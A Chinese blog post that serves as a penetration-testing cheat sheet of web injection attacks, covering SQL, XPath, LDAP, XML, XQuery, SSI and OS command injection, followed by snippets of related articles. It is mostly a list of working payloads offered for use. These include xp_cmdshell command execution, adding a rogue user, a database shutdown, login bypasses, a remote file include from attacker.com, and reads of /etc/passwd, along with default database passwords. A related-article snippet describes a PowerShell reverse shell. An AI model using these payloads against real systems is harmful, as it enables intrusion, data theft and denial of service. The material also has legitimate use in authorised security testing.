web中各种命令注入的检测和利用一

最新推荐文章于 2025-10-13 14:24:03 发布
原创 最新推荐文章于 2025-10-13 14:24:03 发布 · 9.3k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #web #注入 #injection

本文总结了多种Web注入攻击方式,包括SQL注入、XPath注入、LDAP注入等,并提供了每种注入类型的检测方法及利用示例。

0x00 前言

         我们都知道在web 中有着各种数据注入攻击,其中有SQL注入、命令注入、XML注入等等。在平时我们渗透测试的任务中,如何快速检测和利用这些注入的漏洞,以下是一些注入命令总结

0x01 SQL 注入

1.1 通用的 SQL 注入攻击字符

查询中断语法    :           单引号(‘),      双引号(“)
注入SQL注释    :          连字符 (--),哈希(#),,注释(/*)
扩展/追加查询   :          分号 (;)
注入/绕过过滤器 :        CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

1.2 通用的SQL注入命令

注入 union   :Union all select NULL (Multiple columns)

执行命令      :1;exec master..xp_cmdshell ‘dir’>C:\inetpub\ww-wroot\dir.txt’ OR master.dbo.xp_cmdshell

加载文件      :LOAD_FILE(), User UTL_FILE and utfRead-fileAsTable

添加用户     :1’; insert into users values(‘nto’,’nto123’)

DOS攻击    :1’;shutdown –

取字段         : select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

1.3 通用SQL盲注命令

快速检测         :AND 1=1, AND 1=0

用户检测         :1+AND+USER_NAME()=’dbo’

注入等待        :SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

循环/休眠       :BENCHMARK(TIMES, TASK), pg_sleep(10)

1.4 默认用户/密码

Oracle                :            scott/tiger,        dbsnmp/dbsnmp
MySQL               :            mysql/<BLANK>, root/<BLANK>
PostgreSQL      :        postgres/<BLANK>
MS-SQL             :            sa/<BLANK>
DB2                     :           db2admin/db2admin

1.5 后台数据库的通用SQL注入命令

① MS-SQL

Grab version                                              @@version
Users                                                          name FROM master..syslogins
Tables                                                         name FROM master..sysobjects WHERE xtype = ‘U’
Database                                                   name FROM master..sysdatabases;
Columns                                                     name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’)
Running                                                      User DB_NAME()

② Oracle

Grab                                          version table v$version compare with ‘Oracle%’
Users                                       * from dba_users
Tables                                      table_name from all_tables
Database                                distinct owner from all_tables
Columns                                  column_name from all_tab_columns where table_name =‘<TABLENAME>
Running User                         user from dual

③ IBM DB2

Grab                                          Versionnumber from sysibm.sysversions;
Users                                      user from sysibm.sysdummy1
Tables                                      name from sysibm.systables
Database                                schemaname from syscat.schemata
Columns                                 name, tbname, coltype from sysibm.syscolumns
Running User                        user from sysibm.sysdummy1

④ MySQL

Grab                                        @@version
Users                                       * from mysql.user
Tables                                      table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Database                                distinct(db) FROM mysql.db
Columns                                 table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’AND table_schema!=‘information_schema’ AND  table_name == ‘<TABLENAME>’
Running User                        user()

④ PostgreSQL

Grab                                        version()
Users                                       * from pg_user
Database                                datname FROM pg_database
Running User                        user;

0x02 XPATH 注入

检测字符:

单引号: 【 ‘  】
双引号 :【 “  】

利用载荷:

‘ or 1=1 or ‘’=‘

‘] | * | user[@role=’admin

“ NODENAME ”           #返回所有字节点

“ //NODENAME ”         #返回所有文档的元素

“ NODENAME//SUBNODENAME ”             #返回节点元素下的所有子节点

“ //NODENAME/[NAME=‘VALUE’] ”            #返回所有拥有和值相同名字节的节点
http://site.com/login.aspx?username=foo’ or 1=1 or ‘’=‘             #绕过登录

0x03 LDAP 注入

检测字符:

(                        #左开括号
)                        #右闭括号
I                         #pipe - LDAP中or 操作
&                       #Ampersand - LDAP中AND操作
!                         #Exclamation - LDAP中NOT操作

利用载荷:

(&(param1=val1)(param2=val2))                   #AND操作

(|(param1=val1)(param2=val2))                    #NOT操作
*)(ObjectClass=*)) | (&(objectClass=void         #  使用AND操作进行LDAP 盲注
void)(ObjectClass=void))(&(objectClass=void              #  使用OR操作进行LDAP 盲注
http://site.com/ldapsearch?user=*                           #x显示所有用户的属性


0x04 远程代码注入

4.1 上传文件

上传webshell    
PHP, JSP, ASP等等            注入活动的目录
后门执行                                从webroot 进行访问

4.2 远程文件包含/注入

include($incfile);                      PHP调用                   
http://site.com/page.php?file=http://www.attacker.com/exploit               URL注入

0x05 XML 注入

检测方法:

单引号: 【 ‘  】
双引号 :【 “  】

尖括号: 【< > 】
XML注释标签:【  <!--/--> 】
和符号:  【& 】
CDATA段定界符 :   【  <![CDATA[ / ]]> 】

利用方法:

新建与现有标签名称一样的标签值,标签闭合:   【<!-- EXISTING TAG --> 】

添加管理员用户:http://www.example.com/addUser.php?username=dan&password=123456<!--email:--><userid>0</userid><mail>foo@emaildo-main.com

0x06 系统命令注入

检测方法:

| <ANOTHER COMMAND>               #管道-在UNIX类操作系统中,第一个命令输出作为另一个命令的输入,在Windows多个命令执行

; <ANOTHER COMMAND> #分号,同时执行两个命令


利用方法:

%<ENV VARIABLE>%                          # 仅在windows可用

&                             #后台运行命令(仅在*UNIX)

://site.com/whois.php?domain=foobar;echo+/etc/passwd                         #显示文件/etc/passwd 的目录

0x07 XQuery 注入

检测方法:

单引号: 【 ‘  】
双引号 :【 “  】

利用方法:

‘ or <ATTACK> or .=’                  #直接闭合前面XQuery 标签,进行后面标签结合

something” or “”=”        # 利用标签进行闭合后,再闭合

http://site.com/xmlsearch?user=foo” or “”=”                        #显示所有用户的属性

0x08 SSI 注入

检测方法:

include, echo, exec                  #寻找关键词

.SHTML                        #文件后缀名

利用方法:

< ! # = / . “ - > and [a-zA-Z0-9]                         #请求成功执行的字符
<!--#include virtual=”<SOME SYSTEM FILE >” -->
http://site.com/ssiform.php?showfile=<!--#include virtual=”/etc/passwd” -->                               #显示文件/etc/passwd 的目录



欢迎大家分享更好的思路,热切期待^^_^^ !


Web 应用渗透测试 01 - 命令注入(Code Injection)之 create_function
0pr
02-04 1578
这篇文章将讨论 PHP Web 应用中 **create_function** 的命令注入命令注入,究其根源,都是未对用户提供的输入做合理过滤造成的。当然,编程语言本身内置的危险方法的使用,是命令注入频发的另原因。
渗透测试-命令执行注入
lza20001103的博客
07-20 4161
渗透测试-命令执行注入
最新SQL 三种注入方式详解,零基础入门到精通,收藏这篇就够了
最新发布
分享Python知识
10-13 506
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。因此,网络安全领域的薪资近年来也呈现稳步增长的态势。
检测利用命令注入漏洞
m0_71948933的博客
06-21 722
返回个完整路径的文件列表,有不止个版本的 NetCat,它是用来生成连接的工具。|:代表首先执行a命令,在执行b命令,不管a命令成功与否,都会去执行b命令。(当命令a失败时,它仍然会执行命令b,表示A命令语句的输出,作为B命令语句的输入执行。&:代表首先执行命令a再执行命令b,不管a是否成功,都会执行命令b。||:代表首先执行a命令再执行b命令,只有a命令执行不成功,才会执行b命令。&&:代表首先执行命令a,若成功再执行命令b,又被称为短路运算符。可以看到通过whoami获取到了当前用户。
安全测试命令注入
qq_33382118的博客
06-03 315
针对Linux系统,测试使用bash命令。工具如Burp Suite、OWASP ZAPsqlmap可以帮助自动化命令注入测试命令注入种攻击技术,攻击者通过应用程序输入恶意命令,以在目标系统上执行任意命令。如果命令执行结果不可见,可以使用时间延迟来判断命令是否被执行。如,在Linux系统中使用sleep命令。检查应用程序是否对输出进行适当编码,防止命令执行结果直接显示给用户。测试后检查系统日志,确认是否有命令注入尝试被记录。如果命令注入成功,尝试执行更高权限的命令,如sudo或su。
系统命令注入漏洞自动化测试工具 – Commix
nethm的专栏
06-21 5406
Commix是个适用于web开发者、渗透测试人员及安全研究者的自动化测试工具,可以帮助他们更高效的发现web应用中的命令注入攻击相关漏洞。Commix由Python编写。环境要求Python 2.6.x或2.7.x安装下载git clone https://github.com/stasinopoulos/commix.git commix使用基本使用Usage: python commix.p...
web常见漏洞——命令注入
2301_78300030的博客
07-04 1056
1. 某网站的 Ping 命令执行页面:服务器使用的是 Windows Server 系统,在文本框中输入 8.8.8.8&&net user ,利用 && 符号连接了 ping 8.8.8.8 net user 两个命令,成功注入并获取到 net user 命令的执行结果,显示了系统用户信息。这个示中,我们使用`Runtime.exec()`方法执行了个`ping`命令,然后通过`BufferedReader`读取命令执行结果的输入流,并将结果输出到控制台。// 获取命令执行结果的输入流。
Web环境下SQL注入攻击的检测
03-03
【SQL注入检测/防御/跟踪模型】是应对这威胁的关键。该模型包含客户端服务端的两级检查机制。客户端的初步检查旨在过滤掉般性误操作低等级攻击,减轻服务器负担;而服务器端的二级检查作为最后防线,用于...
【OS命令注入】常见OS命令执行函数以及OS命令注入利用以及靶场实验—基于DVWA靶场
m0_64378913的博客
06-26 2730
背景:程序员使用脚本语言(如PHP等)开发应用程序过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着些问题,比如速度慢、无法触及系统底层等。开发的应用时,特殊是企业级的些应用需要去调用些外部程序(系统命令或者exe等可执行文件),当应用需要调用些外部程序时就会用到些系统命令的函数。OS命令注入:当应用在调用这些系统命令函数时,如果将用户的输入作为系统命令的参数拼接到命令中,在没有过滤用户输入的情况下,就会造成命令执行漏洞。条件:漏洞危害:作用:该函数能够将字符串作为OS命令执行,自带输出功能。
检测利用OS命令注入漏洞指南
"该文档是关于测试操作系统的OS命令注入漏洞的指南,主要涉及如何识别利用这种漏洞,以及在发现漏洞后如何进步探索利用系统权限。" 在网络安全领域,OS命令注入种常见的攻击手段,它允许攻击者通过输入...
4-8〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸命令注入漏洞
“被信息安全硌得牙疼?来这儿,包你嚼得动、咽得香!😋”核心知识掰开嚼碎,攻防大战揭秘如追剧,政策法规解读不瞌睡!每周两顿“安全小灶”,保准有趣有料还不胖!觉得有用?点赞❤️收藏⭐ 鼓励一下呗!+关注😉= 永久VIP席位,速来!!!
10-05 4983
本文探讨了Web应用中的命令注入漏洞及其利用方法。文章首先声明仅用于安全研究,严禁非法用途。重点分析了通过git命令注入绕过过滤器的技术,展示了如何利用命令分隔符串联恶意指令。实战演示中,攻击者通过构造PowerShell命令下载并执行powercat脚本,成功建立反向Shell控制目标系统。文章详细剖析了漏洞成因——不当的输入验证命令拼接,并提供了防御建议:使用API替代系统命令、实施严格输入过滤、禁用危险功能等。最后强调该技术仅用于安全研究,呼吁遵守法律。
安全测试系列1 命令注入漏洞
dabaoting的博客
03-05 513
命令注入漏洞常用漏洞利用SQL注入XSS(跨站脚本)漏洞CSRF(跨站请求伪造) 常用漏洞利用 闭合前后上下文 多语句分号 ; 条件执行 && || 管道符号 | SQL注入 常见漏洞: where条件:OR 1=1 union -- -:注释后面的语句 预防:使用参数化查询,避免数据被混在指令中 XSS(跨站脚本)漏洞 简介: 种网站应用程序的安全漏洞攻击,是代码注入种; 它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响; 攻击通常包含了HTM
web访问命令
weixin_30788731的博客
07-25 681
https://github.com/yudai/gotty go get github.com/yudai/gotty gotty -p 8000 -w kubectl exec -it mysql-5fc8fb5766-vsw9s bash 转载于:https://www.cnblogs.com/mhc-fly/p/9366534.html
Web命令执行
qq_53086690的博客
06-16 454
利用通配符来执行命令 c=/?in/cat+/et?/passw? 可以当做/bin/cat/etc/passwd ?可以匹配任意字符 过滤空格的方法 %20(space)、%09(tab)、$IFS$9、 IFS、IFS 使用<或者<>来绕过空格 cat<a.txt 花括号扩展{,} {cat,/etc/passwd} $IFS 空格绕过 cat$IFS$1a.txt 变量控制 X=$'cat\x09./flag.php 关键词过滤 使用空变量 使用$*$@,$x(x 代表 1
WEB命令执行
zip471642048的博客
01-06 1374
web29 简单绕过 web30 绕过禁用的system函数可以用passthru代替 常见执行命令的函数 https://blog.csdn.net/whatday/article/details/106985758 system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() web31 过滤了空格可以用%09代替 空格绕过 ${IFS} 但不能写作 $IFS $IFS$9 %09 <> <
web-命令执行
qq_60518252的博客
01-21 849
2.2 rce中常用的包含文件函数 include highlight_file 1)highlight_file函数 (别名:show_source) 对文件进行 PHP 语法高亮显示,语法通过使用 HTML 标签进行高亮; 当使用该函数时,整个文件都将被显示,包括密码其他敏感信息! highlight_file(string $filename, bool $return = false): mixed (highlight_file(filename,return)) ...
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 1262
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括些题目解答,自己的笔记总结,有错误还希望大家指正,起学习进步!
Web入门---命令执行
s849602863的博客
05-21 1490
ctfshow-Web入门---命令执行
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值